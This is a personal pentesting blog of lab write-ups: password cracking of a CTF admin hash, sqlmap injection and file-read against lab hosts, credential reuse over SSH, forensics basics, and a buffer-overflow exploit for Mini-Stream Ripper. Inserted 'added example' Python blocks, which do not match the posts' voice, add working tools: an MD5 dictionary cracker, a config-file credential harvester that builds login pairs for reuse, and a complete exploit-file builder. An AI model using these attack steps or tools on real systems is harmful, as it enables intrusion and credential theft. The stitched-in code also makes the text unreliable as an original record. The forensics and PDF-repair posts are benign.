Monday, September 24, 2012

John The Ripper VS GPU oclhashcat+

Hi guys, long time no see... :D
Now I want to share my experience with the difference in password cracking between John the Ripper and GPU oclHashcat+. OK, check this out :D

I have the BadStore CTF running in my VirtualBox.

I took over its databases; there is one database there, badstoredb.

So I look for a users table in it. This is the users table:

Now I want to see the content of userdb, so I select everything from userdb with a command in mysql.

Wow, now I have the user and password, but the password is only a hash :(
Don't worry guys, now I will use John the Ripper and GPU oclHashcat+ to crack the admin's password. I create two files, named JTR and GPU, one for each tool, each containing the admin password hash.

Both files contain the same admin hash. I ran JTR and the GPU at the same time, with the same dictionary (darkc0de.lst), and what I saw is that the GPU cracked the password fast!
Let's see it!
This is the plain text output:
====================================================
root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus32.bin -m 0 /root/Desktop/gpu /pentest/passwords/wordlists/darkc0de.lst
oclHashcat-plus v0.07 by atom starting...

Hashes: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 1
GPU-Loops: 128
GPU-Accel: 40
Password lengths range: 1 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Loveland, 384MB, 0Mhz, 2MCU
Device #1: Allocating 12MB host-memory
Device #1: Kernel ./kernels/4098/m0000_a0.Loveland.32.kernel (1130280 bytes)

Scanned dictionary /pentest/passwords/wordlists/darkc0de.lst: 17975854 bytes, 1707657 words, 1707657 keyspace, starting attack...

5ebe2294ecd0e0f08eab7690d2a6ee69:secret
                                   
Status.......: Cracked
Input.Mode...: File (/pentest/passwords/wordlists/darkc0de.lst)
Hash.Target..: 5ebe2294ecd0e0f08eab7690d2a6ee69
Hash.Type....: MD5
Time.Running.: 0 secs
Time.Util....: 924.9ms/524.9ms Real/CPU, 131.2% idle
Speed........:  1616.4k c/s Real,  1880.1k c/s GPU
Recovered....: 1/1 Digests, 1/1 Salts
Progress.....: 1550322/1707657 (90.79%)
Rejected.....: 55282/1550322 (3.57%)
HW.Monitor.#1: 63% GPU, 72c Temp

Started: Tue Sep 25 05:25:58 2012
Stopped: Tue Sep 25 05:25:59 2012

root@bt:/pentest/passwords/oclhashcat+#
====================================================


And now JTR.
This is the plain text output:
====================================================
root@bt:/pentest/passwords/john# john /pentest/passwords/wordlists/darkc0de.lst /root/Desktop/JTR
Warning: only loading hashes of type "trip", but also saw type "pix-md5"
Use the "--format=pix-md5" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "des"
Use the "--format=des" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "mysql"
Use the "--format=mysql" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "oracle"
Use the "--format=oracle" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "lm"
Use the "--format=lm" option to force loading hashes of that type instead
Loaded 48504 password hashes with no different salts (Tripcode DES [128/128 BS SSE2])
guesses: 0  time: 0:00:22:12 0.00% (3)  c/s: 16596M  trying: 41675*1d - 4176791d
Session aborted
root@bt:/pentest/passwords/john#

====================================================

It's very different, guys.
OK, see you next time :D
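An added example, not from the original post, that does in Python what both tools were asked to do here: a dictionary attack on the admin's unsalted MD5. It uses a constructed six-word stand-in for darkc0de.lst and applies the same 1-15 character length filter that shows up as "Rejected" in the oclHashcat-plus output above; the batch function shows why unsalted hashes are cheap to crack in bulk. One thing worth reading from the john output before comparing the two tools: the wordlist was passed as a positional argument, which john treats as another hash file, and the 32-hex-character MD5 was auto-detected as "trip" (Tripcode DES), so john never ran the dictionary against an MD5 at all. The like-for-like command is `john --format=raw-md5 --wordlist=/pentest/passwords/wordlists/darkc0de.lst /root/Desktop/JTR`.

```python
import hashlib

# Constructed stand-in for darkc0de.lst: a handful of lines, not the real wordlist.
WORDLIST = [
    "password",
    "123456",
    "a",
    "thisisaverylongpassphrase",  # 25 chars: outside the 1-15 range, so it is rejected
    "secret",
    "qwerty",
]

# The admin hash from the post.
TARGET = "5ebe2294ecd0e0f08eab7690d2a6ee69"


def md5_hex(word):
    """Raw MD5 of the candidate's bytes, the way a wordlist line is hashed (no salt)."""
    return hashlib.md5(word.encode("latin-1")).hexdigest()


def load_wordlist(path):
    """Yield candidates from a real wordlist; latin-1 keeps every byte as-is."""
    with open(path, "r", encoding="latin-1") as f:
        for line in f:
            yield line.rstrip("\r\n")


def crack_md5(target_hex, words, min_len=1, max_len=15):
    """Dictionary attack on a single unsalted MD5 digest.

    Candidates outside the length range are skipped without being hashed
    (oclHashcat-plus counts these as 'Rejected'); everything else is hashed
    and compared. Returns (plaintext_or_None, hashed, rejected).
    """
    target = target_hex.lower()
    hashed = rejected = 0
    for w in words:
        if not min_len <= len(w) <= max_len:
            rejected += 1
            continue
        hashed += 1
        if md5_hex(w) == target:
            return w, hashed, rejected
    return None, hashed, rejected


def crack_md5_batch(target_hexes, words, min_len=1, max_len=15):
    """Attack many unsalted digests in one pass over the wordlist.

    Each candidate is hashed once and looked up in a set of all targets, so
    cracking N unsalted hashes costs about the same as cracking one. A per-user
    salt would force one hash computation per candidate per user instead.
    Returns {digest: plaintext} for every digest recovered.
    """
    remaining = {h.lower() for h in target_hexes}
    found = {}
    for w in words:
        if not remaining:
            break
        if not min_len <= len(w) <= max_len:
            continue
        h = md5_hex(w)
        if h in remaining:
            found[h] = w
            remaining.discard(h)
    return found


if __name__ == "__main__":
    print(crack_md5(TARGET, WORDLIST))
```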

Tuesday, July 31, 2012

ignore switch -D on Firebird (SQLMAP)

Hi there, I want to share my experience.
I found an error at 192.168.56.102/index.php?page=beritaDetail&id=103, so I used sqlmap to retrieve the databases. I typed in sqlmap:
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbs" A few minutes later I had a problem: sqlmap couldn't retrieve the database names.
This is the result:
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
I read the sqlmap user's manual at http://sqlmap.sourceforge.net/doc/README.html. sqlmap supports attacking this database (Firebird); this is its list of supported DBMSes, with the Python bindings each one needs:

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.
But then why can't my sqlmap retrieve the database names?

     So I asked a friend for a solution, and he answered that it means sqlmap won't be able to retrieve database names, as everything is going into a single one, and that I just have --tables and must ignore the -D switch on Firebird (the same applies to SQLite and MS Access).

    So I try ignoring -D, like this:
    "./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbms Firebird --tables" and I see that I get past the problem. This is the result:
    "web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: Firebird 2.0
    [14:33:30] [INFO] fetching tables for database: Firebird_masterdb
    [14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"


    Tuesday, April 24, 2012

    simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

    Hello guys, now I want to share web hacking through another attack vector.
    I have a victim at address 192.168.56.101. I want to see which services are running, so I use nmap:
    root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

    Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.0016s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
    Service Info: OS: Linux

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
    root@archaveliano:/home/localhost# 


    In the web application I found a form that takes a user ID, and tried entering a single quote ( ' ). I got a syntax error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

     It's time to work. I opened sqlmap and typed "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 --dbms MySQL --dbs". The options: -u is the URL; --cookie is the session cookie, because this web application requires a login; -p is the vulnerable parameter; --risk is the risk of the tests to perform (max 3); --level is the level of tests to perform (max 5); --threads (abbreviated above as --thread) is the maximum number of concurrent HTTP(s) requests (max 10); --dbms forces the back-end DBMS to this value; and --dbs enumerates the DBMS databases.

    It doesn't take long, and I can retrieve the databases like this:
    [22:22:06] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [22:22:06] [INFO] fetching database names
    [22:22:06] [INFO] the SQL query used returns 4 entries
    [22:22:06] [INFO] starting 4 threads
    [22:22:06] [INFO] retrieved: information_schema
    [22:22:06] [INFO] retrieved: mysql
    [22:22:06] [INFO] retrieved: fbip
    [22:22:06] [INFO] retrieved: dvwa
    available databases [4]:
    [*] dvwa
    [*] fbip
    [*] information_schema
    [*] mysql

    Now I have 4 databases, and I will take over the mysql database. I enter this in sqlmap: "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 -D mysql --tables --dbs"
     But I hit a problem, like this:
    [22:15:20] [WARNING] no column(s) found
    [22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

    I try to find another way, and I remember that sqlmap cannot only take over the database, it can also read files from the server (--file-read). Now I will try it, but before that I need to know where the file I want is, so I use DirBuster to find it.
    The file I need is at /config/config.inc.php, so in sqlmap I enter this:
    "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1" and I get the web config:
    sqlmap saves the file it read under its output directory for this host, in output/192.168.56.101/files/:
    Now I know the MySQL user and password of this web application. I try to log in to MySQL with them, but I hit a problem again:
    root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
    Enter password: 
    ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server

    I try SSH, because people often reuse the same password:
    root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

    And this is the result:

    It's very simple, right?!
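An added example, not from the original post, for the last two steps of the chain above: pulling the credentials out of a config file retrieved with --file-read and turning them into (user, password) pairs to try on the other services nmap found (MySQL, SSH). The post's screenshot of the real config.inc.php is missing, so the sample below is constructed in the shape of DVWA's config (the values are made up); the key list and the "always try root" guess are assumptions, and the parser also accepts plain `$var = '...'` and `define('KEY', '...')` forms that the post does not show.

```python
import re

# Constructed sample in the shape of DVWA's config/config.inc.php (made-up values).
SAMPLE_CONFIG = r"""<?php
$_DVWA = array();
$_DVWA[ 'db_server' ]   = 'localhost';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'root';
$_DVWA[ 'db_password' ] = 'toor';
$db_host = "127.0.0.1";
define('SECRET_SALT', "x\"y");
?>
"""

# Heuristic list of setting names that usually carry something worth reusing (assumption).
CRED_KEYS = re.compile(r"user|username|login|pass|password|pwd|secret|salt|key|host|server", re.I)

# Three PHP assignment shapes:  $arr[ 'key' ] = 'v';   $key = "v";   define('KEY', 'v');
ASSIGN = re.compile(r"""
    (?:
        \$\w+\s*\[\s*['"](?P<k1>[^'"]+)['"]\s*\]\s*=\s*     # $_DVWA[ 'db_user' ] =
      | \$(?P<k2>\w+)\s*=\s*                                # $db_user =
      | define\s*\(\s*['"](?P<k3>[^'"]+)['"]\s*,\s*         # define('DB_USER',
    )
    (?P<q>['"])(?P<v>(?:\\.|(?!(?P=q)).)*)(?P=q)            # quoted value, backslash escapes allowed
""", re.X)


def _unescape(value):
    """Undo simple PHP backslash escapes inside a quoted string."""
    return re.sub(r"\\(.)", r"\1", value)


def extract_php_settings(text):
    """Map every string-valued setting in a PHP config to its value."""
    settings = {}
    for m in ASSIGN.finditer(text):
        key = m.group("k1") or m.group("k2") or m.group("k3")
        settings[key] = _unescape(m.group("v"))
    return settings


def credentials(settings):
    """Keep only the settings whose name looks credential-related."""
    return {k: v for k, v in settings.items() if CRED_KEYS.search(k)}


def reuse_candidates(settings):
    """(user, password) pairs to try on other services, sorted for stable output.

    Every user-like value is combined with every password-like value, plus a
    'root' guess (assumption), which is the pairing that worked over SSH in the post.
    """
    users = {v for k, v in settings.items() if re.search(r"user|login", k, re.I)}
    users.add("root")
    passwords = {v for k, v in settings.items() if re.search(r"pass|pwd", k, re.I)}
    return sorted((u, p) for u in users for p in passwords)


if __name__ == "__main__":
    found = extract_php_settings(SAMPLE_CONFIG)
    print(credentials(found))
    print(reuse_candidates(found))
```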






    Friday, March 9, 2012

    Learning About Computer Forensics (Basic)

         Before we learn computer forensics, we should first know what forensics and computer forensics mean. Forensics is the collection of evidence related to a case that can be presented as valid evidence in court. Computer forensics is the collection of evidence in the form of information systems, whether hardware or software, related to a case, that can be presented as valid evidence in court.
         People who want to learn computer forensics must also understand hacking, how operating systems work, and forensics itself. This will be needed if the case being handled involves digital crime.
         Before doing computer forensics work, we should first know its foundations, because without knowing and holding firmly to those foundations, the forensic work will not go well.

    1. Identification
      This is done at the crime scene: sorting out which items are suitable to be presented as evidence in court.

    2. Collecting (at the crime scene)
      a. chain of custody: labelling the evidence and protecting it so that nothing changes while the data is being cloned; if anything changes during cloning, the evidence is considered invalid.

      b. acquisition: cloning the evidence (usually data, for example cloning a whole hard disk bit by bit).

      c. fingerprint: the clone is compared against the original evidence; if even one bit differs, the evidence is invalid.

    3. Analysis
      a. chain of custody: this differs from the chain of custody in the collecting phase. In this phase we make the cloned evidence read-only (write blocking), so that the evidence we have cannot change in the slightest.

      b. analysis: this phase tests our analytical skill, because here we rely entirely on our ability to analyse.

      c. collecting: collecting here means gathering the results of our analysis.

      d. reconstruction: after the results of our analysis are gathered, we should reconstruct the events, so the story can be told in court.

    4. Presentation / report
      The last phase before court: writing the report and the conclusions.

    Those are the foundations of learning computer forensics; our ability and extraordinary effort to learn forensics are truly tested here.
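An added example, not from the original post, of phases 2b, 2c and 3a above in Python: a bit-for-bit acquisition (a stand-in for dd) that fingerprints the source while it is read, a verification step that fails if even one bit of the image differs, and a software write-block on the working copy. The "disk" is a constructed byte string written to a temporary file; the two-digest fingerprint (md5 plus sha256) is the usual practice, not something the post specifies.

```python
import hashlib
import os
import tempfile

CHUNK = 1024 * 1024               # hash and copy in 1 MiB blocks so a whole disk never sits in memory
ALGORITHMS = ("md5", "sha256")    # two independent digests are the usual forensic fingerprint


def _new_hashers():
    return {name: hashlib.new(name) for name in ALGORITHMS}


def _digests(hashers):
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_file(path):
    """Fingerprint a file in one pass with every algorithm in ALGORITHMS."""
    hashers = _new_hashers()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            for h in hashers.values():
                h.update(block)
    return _digests(hashers)


def acquire(source_path, image_path):
    """Bit-for-bit copy of the source (stand-in for dd), hashing the source as it is
    read so the reference fingerprint comes from the original at acquisition time
    rather than from a later re-read of the media. Returns the reference digests."""
    hashers = _new_hashers()
    with open(source_path, "rb") as src, open(image_path, "wb") as dst:
        for block in iter(lambda: src.read(CHUNK), b""):
            for h in hashers.values():
                h.update(block)
            dst.write(block)
    # Software write-block on the working copy (phase 3a); the original media
    # should sit behind a hardware write blocker instead.
    os.chmod(image_path, 0o444)
    return _digests(hashers)


def verify_image(image_path, reference):
    """Fingerprint check (phase 2c): valid only if every digest matches.
    Returns (ok, actual_digests)."""
    actual = hash_file(image_path)
    return all(actual[name] == reference[name] for name in reference), actual


def demo(source_bytes=b"abc"):
    """Acquire a constructed 'disk', verify the image, then flip a single bit in a
    copy and verify again. Returns the reference digests and both verdicts."""
    if not source_bytes:
        raise ValueError("need at least one byte to tamper with")
    with tempfile.TemporaryDirectory() as tmp:
        src, img, bad = (os.path.join(tmp, n) for n in ("disk.raw", "disk.dd", "tampered.dd"))
        with open(src, "wb") as f:
            f.write(source_bytes)
        reference = acquire(src, img)
        ok_clean, _ = verify_image(img, reference)
        with open(img, "rb") as f:
            data = bytearray(f.read())
        data[0] ^= 0x01                       # one flipped bit
        with open(bad, "wb") as f:
            f.write(bytes(data))
        ok_tampered, _ = verify_image(bad, reference)
        os.chmod(img, 0o644)                  # let the temp dir be removed on every platform
        return {"reference": reference, "clean": ok_clean, "tampered": ok_tampered}


if __name__ == "__main__":
    print(demo())
```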

    Saturday, March 3, 2012

    play with peepdf (basic)

    Tested        : BackTrack 5 R2
    Tools         : peepdf, Foxit Reader
    PDF titles    : forensics.pdf, linux.pdf and howto.pdf
    Target        : forensics.pdf

    I am learning about computer forensics now, and I have a problem with my PDF: it can't be opened.
    This is the picture:

    Now open peepdf from the BackTrack tools. Then I type "./peepdf.py -h" to learn how to use this tool.

    root@archaveliano:/pentest/forensics/peepdf# ./peepdf.py -h 
    Usage: ./peepdf.py [options] PDF_file 


    Options: 
      -h, --help            show this help message and exit 
      -i, --interactive     Sets console mode. 
      -f, --force-mode      Sets force parsing mode to ignore errors. 
      -l, --loose-mode      Sets loose parsing mode to catch malformed objects. 
      -s SCRIPTFILE, --load-script=SCRIPTFILE 
                            Load the commands stored in the specified file and 
                            execute them. 

    Knowing that, I try console mode:
    root@archaveliano:/pentest/forensics/peepdf# ./peepdf.py -i /media/BCA8-FC99/forensics.pdf  
    Error: Bad PDF header!! () 

    OK, now I know my PDF file has a bad header, so I try to find out what a PDF header looks like. I need a normal PDF
    file to compare with my forensics.pdf, so I take other PDF files: I chose linux.pdf and howto.pdf to
    compare their headers with forensics.pdf.

    Open linux.pdf, howto.pdf and forensics.pdf in hexedit. This is a screenshot:

    Look at forensics.pdf: its header differs from linux.pdf and howto.pdf, so I edit the
    forensics.pdf header from AA 50 44 AA 2D AA 2E to 25 50 44 46 2D 31 2E ("%PDF-1.") and save it.

    Now I try to open forensics.pdf with Foxit Reader. And this is the result.

    -=CMIIW=-
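An added example, not from the original post or from peepdf, that does the hexedit repair above programmatically: it looks for a parseable "%PDF-x.y" header (the check that fails with "Bad PDF header"), and if there is none it rewrites only the leading bytes that differ from "%PDF-1." and reports which offsets it touched. The sample file is constructed with exactly the damage shown in the post (bytes 0, 3 and 5 became 0xAA); the 1024-byte search window and the %%EOF check are general PDF practice, not something the post covers.

```python
import re

PDF_MAGIC = b"%PDF-1."        # 25 50 44 46 2D 31 2E: the bytes every PDF 1.x starts with
HEADER_WINDOW = 1024          # readers tolerate junk before the header, but only within the first 1 KiB

# Constructed sample with the damage the post shows in hexedit: bytes 0, 3 and 5
# of the header became 0xAA. The rest is a minimal PDF skeleton.
BROKEN_PDF = (b"\xAA\x50\x44\xAA\x2D\xAA\x2E4\n"
              b"1 0 obj\n<< /Type /Catalog >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


def find_header(data):
    """Return (offset, version) of a parseable '%PDF-x.y' header, or None.

    peepdf's 'Bad PDF header' error is this lookup failing.
    """
    m = re.search(rb"%PDF-(\d\.\d)", data[:HEADER_WINDOW + 8])
    return (m.start(), m.group(1).decode("ascii")) if m else None


def repair_header(data):
    """Rewrite damaged leading bytes to '%PDF-1.', as the post does by hand.

    A file that already has a findable header is returned untouched. Otherwise
    only bytes that differ from the magic are patched and their offsets are
    reported. The version digit after '1.' is not part of the magic and is kept
    as found; if it was clobbered too it has to be guessed separately.
    Returns (repaired_bytes, patched_offsets).
    """
    if len(data) < len(PDF_MAGIC) + 1:
        raise ValueError("file too short to carry a PDF header")
    if find_header(data) is not None:
        return data, []
    head = bytearray(data[:len(PDF_MAGIC)])
    patched = [i for i, expected in enumerate(PDF_MAGIC) if head[i] != expected]
    for i in patched:
        head[i] = PDF_MAGIC[i]
    return bytes(head) + data[len(PDF_MAGIC):], patched


def has_eof_marker(data):
    """Companion check: a truncated file is a different problem from a bad header."""
    return b"%%EOF" in data[-HEADER_WINDOW:]


def repair_file(src_path, dst_path):
    """Repair src_path into dst_path (never in place: the damaged original is evidence)."""
    with open(src_path, "rb") as f:
        fixed, patched = repair_header(f.read())
    with open(dst_path, "wb") as f:
        f.write(fixed)
    return patched


if __name__ == "__main__":
    fixed, patched = repair_header(BROKEN_PDF)
    print(patched, fixed[:8], find_header(fixed), has_eof_marker(fixed))
```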


    Monday, February 20, 2012

    Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow

    # Exploit Title: Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow
    # Link: http://mini-stream.net/mini-stream-ripper/download/
    # Version: 3.1.3.2.2010.06.13
    # Tested on: Microsoft Windows XP SP 2

    OK, I have this fuzzer, and I'll try to exploit this application. The fuzzer:

    # Fuzzer 1: a URL-looking prefix followed by 18000 'A' (0x41) bytes.
    # Bytes and binary mode, so the file is written verbatim under Python 2 and 3.
    wed = b"http://."
    wed += b"\x41" * 18000
    with open("dos.ram", "wb") as f:
        f.write(wed)

    Let's try to catch that. First, prepare Immunity Debugger, the fuzzer and Mini-Stream Ripper. Then run the application from Immunity; when I load the file my fuzzer generated, the application crashes at 18000 characters and I can see that EIP is overwritten with 41414141. We know this is a direct RET overwrite, so this will be easy. Now I try to find at which byte EIP gets overwritten, using pattern_create from the Metasploit Framework. This time EIP is overwritten with 69573569 and ESP points at Wi8Wi9Wj0. From these we can find out at how many bytes the registers are overwritten, using pattern_offset.

    ESP hits at byte 17424 and EIP at byte 17416. Now I'll use this fuzzer to confirm the EIP offset.

    # Fuzzer 2: 17416 bytes of filler, then DEADBEEF written little-endian
    # (\xEF\xBE\xAD\xDE) so the debugger shows EIP = DEADBEEF.
    wed = b"http://."
    wed += b"\x90" * 17416
    wed += b"\xEF\xBE\xAD\xDE"
    with open("dos.ram", "wb") as f:
        f.write(wed)

    And EIP changes to DEADBEEF. After this I'll try to find a JMP ESP; let's go find it :D
    I found a JMP ESP in user32.dll at address 77D8AF0A. The next fuzzer fills the space after EIP up to ESP with NOPs and the rest with INT3 breakpoints, to check where ESP lands:

    # Fuzzer 3: the pattern_offset values (17416 for EIP, 17424 for ESP) are
    # relative to the pattern, which starts after the 8-byte "http://." prefix,
    # so pad up to prefix + 17424. (The original computed 17424 - len(wed), which
    # is negative at that point and therefore added no padding at all.)
    prefix = b"http://."
    wed = prefix
    wed += b"\x90" * 17416
    wed += b"\xEF\xBE\xAD\xDE"                            # EIP placeholder; the JMP ESP address goes here
    wed += b"\x90" * (len(prefix) + 17424 - len(wed))    # NOPs up to where ESP points
    wed += b"\xCC" * (18000 - len(wed))                   # INT3s: the debugger breaks if ESP lands here
    with open("dos.ram", "wb") as f:
        f.write(wed)

    Now I try to exploit this application with a payload from Metasploit.
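An added example, not from the original post, that ties the steps above together in Python: a re-implementation of Metasploit's pattern_create/pattern_offset that reproduces the post's offsets (EIP 17416, ESP 17424) from the register values shown in the debugger, and a builder that lays out the final .ram file with the JMP ESP address at EIP and the payload where ESP points. The prefix, crash length, offsets and the user32.dll address 77D8AF0A are taken from the post; the INT3 stand-in payload is a placeholder for the Metasploit shellcode the post stops short of.

```python
import re
import string
import struct

# Metasploit-style cyclic pattern: every 3-byte window is unique for
# 26*26*10 triplets, so a pattern longer than that would repeat.
MAX_PATTERN = 26 * 26 * 10 * 3  # 20280


def pattern_create(length):
    """Same output as pattern_create.rb: 'Aa0Aa1Aa2...Ab0...Zz9', truncated to length."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes is no longer unique" % MAX_PATTERN)
    full = "".join(u + l + d for u in string.ascii_uppercase
                   for l in string.ascii_lowercase for d in string.digits)
    return full[:length]


def pattern_offset(value):
    """Offset of a register value into the pattern, like pattern_offset.rb.

    Accepts the bytes as shown in a memory dump ('Wi8Wi9Wj0') or the hex value
    as shown in the register window ('69573569'), which is the same bytes in
    little-endian order. Returns -1 when the value is not in the pattern.
    """
    if re.fullmatch(r"(0x)?[0-9A-Fa-f]{8}", value):
        value = struct.pack("<I", int(value, 16)).decode("latin-1")
    return pattern_create(MAX_PATTERN).find(value)


# Values from the post.
PREFIX = b"http://."
EIP_OFFSET = 17416          # pattern_offset("69573569"), relative to the pattern (after PREFIX)
ESP_OFFSET = 17424          # pattern_offset("Wi8Wi9Wj0")
BODY_LEN = 18000            # crash length found with fuzzer 1
JMP_ESP = 0x77D8AF0A        # JMP ESP in user32.dll on the post's XP SP2 box (no ASLR there)


def build_ram(payload, ret=JMP_ESP):
    """Lay out the .ram file: [prefix][filler][RET][pad to ESP][payload][filler].

    Offsets from pattern_offset are relative to the pattern, i.e. to the bytes
    after PREFIX, so each file offset is len(PREFIX) plus the pattern offset.
    """
    gap = ESP_OFFSET - (EIP_OFFSET + 4)          # bytes between the saved EIP and where ESP points
    buf = PREFIX + b"\x90" * EIP_OFFSET
    buf += struct.pack("<I", ret)                # overwrite EIP with JMP ESP, little-endian
    buf += b"\x90" * gap                         # so ESP lands on the first payload byte
    buf += payload
    room = len(PREFIX) + BODY_LEN - len(buf)
    if room < 0:
        raise ValueError("payload is %d bytes too long" % -room)
    return buf + b"\x90" * room                  # keep the total length at the crash size


if __name__ == "__main__":
    print(pattern_offset("69573569"), pattern_offset("Wi8Wi9Wj0"))
    # \xCC (INT3) stand-in: the debugger breaks on it if ESP really lands here.
    with open("exploit.ram", "wb") as f:
        f.write(build_ram(b"\xCC" * 16))
```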

    Friday, February 10, 2012

    WARNING!!

    To: IS2C
    DO THE WORK YOURSELF!!!
    If anything turns out to be the same as what is on this blog, there will be punishment tomorrow.